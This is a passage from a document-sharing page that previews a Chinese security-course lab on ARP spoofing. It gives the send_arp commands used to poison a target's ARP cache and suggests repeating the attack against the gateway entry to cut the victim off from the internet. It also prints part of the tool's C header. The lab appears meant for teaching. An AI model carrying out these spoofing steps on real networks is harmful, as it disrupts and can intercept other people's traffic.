计算机安全技术TOOLS教程课件5.5.1 实例:arp欺骗.docVIP

计算机安全技术TOOLS教程课件5.5.1 实例:arp欺骗.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
5.5.1 实例:arp欺骗 1.实验环境 实验环境如图5-34所示。欺骗者(192.168.1.10),被欺骗者(192.168.1.20)。 2.arp欺骗过程 第1步:被欺骗者可以ping通欺骗者。被欺骗者(192.168.1.20)执行ping 192.168.1.10 -n 1命令,可以ping通。然后执行arp -a命令查看arp缓存,得知欺骗者(192.168.1.10)的MAC地址为00:30:18:91:20:54,如图5-35所示。 第2步:进行arp欺骗。如图5-36所示,欺骗者(192.168.1.10)先执行ping 192.168.1.20 -c 1命令,可以ping通。然后执行arp -a命令查看arp缓存,得知被欺骗者(192.168.1.20)的MAC地址为00:C0:9F:97:E3:F9。再执行ifconfig eth0命令,查看本网卡的MAC地址,然后执行./send_arp.o 192.168.1.10 00:0c:29:d5:91:11 192.168.1.20 00:C0:9F:97:E3:F9 1命令,对192.168.1.20进行arp欺骗。其中,send_arp.o语法为: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number 提示: 被欺骗者(192.168.1.20)MAC地址的获得可以先执行ping 192.168.1.10命令,然后执行arp -a命令查看arp缓存。 图5-34 实验环境 图5-35 被欺骗者可以ping通欺骗者 图5-36 进行arp欺骗 图5-37 被欺骗者不可以ping通欺骗者 第3步:被欺骗者不可以ping通欺骗者。如图5-37所示,先执行ping 192.168.1.10 -n 1命令,不可以ping通,再执行arp -a命令查看arp缓存,可知192.168.1.10的MAC地址已变。 如果本网络的网关是192.168.1.1,那么想让192.168.1.20不能访问互联网,就可以执行命令./send_arp.o 192.168.1.1 xx:xx:xx:xx:xx:xx 192.168.1.20 00:C0:9F:97:E3:F9 1命令,对192.168.1.20进行arp欺骗。可以每分钟执行一次该命令,192.168.1.20得不到正确的到网关的arp映射表项,就访问不了互联网了。 3.源程序 头文件“send_arp.h”: 1 #include stdlib.h 2 #include netdb.h 3 #include sys/socket.h 4 #include sys/types.h 5 #include stdio.h 6 #include errno.h 7 #include sys/ioctl.h 8 #include net/if.h 9 #include signal.h 10 #include netinet/ip.h 11 #include netinet/in.h 12 #include string.h 13 #include arpa/inet.h 14 #include netinet/ip_icmp.h 15 #include linux/if_ether.h 16 17 #define ETH_HW_ADDR_LEN 6 18 #define IP_ADDR_LEN 4 19 #define ARP_FRAME_TYPE 0x0806 20 #define ETHER_HW_TYPE 1 21 #define IP_PROTO_TYPE 0x0800 22 #define OP_ARP_REQUEST 2 23 #define OP_ARP_QUEST 1 24 #define DEFAULT_DEVICE eth0 25 char usage[] = {send_arp: sends out custom ARP packet. \n 26 usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number}; 27 28 struct arp_packet 29 { 30 u_char targ_hw_addr[ETH_HW_ADDR_LEN]; 31 u_char src_hw_addr[ETH_HW_ADDR_LEN]; 32 u_short frame_type; 33 u_short hw_type;

您可能关注的文档

文档评论(0)

带头大哥 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档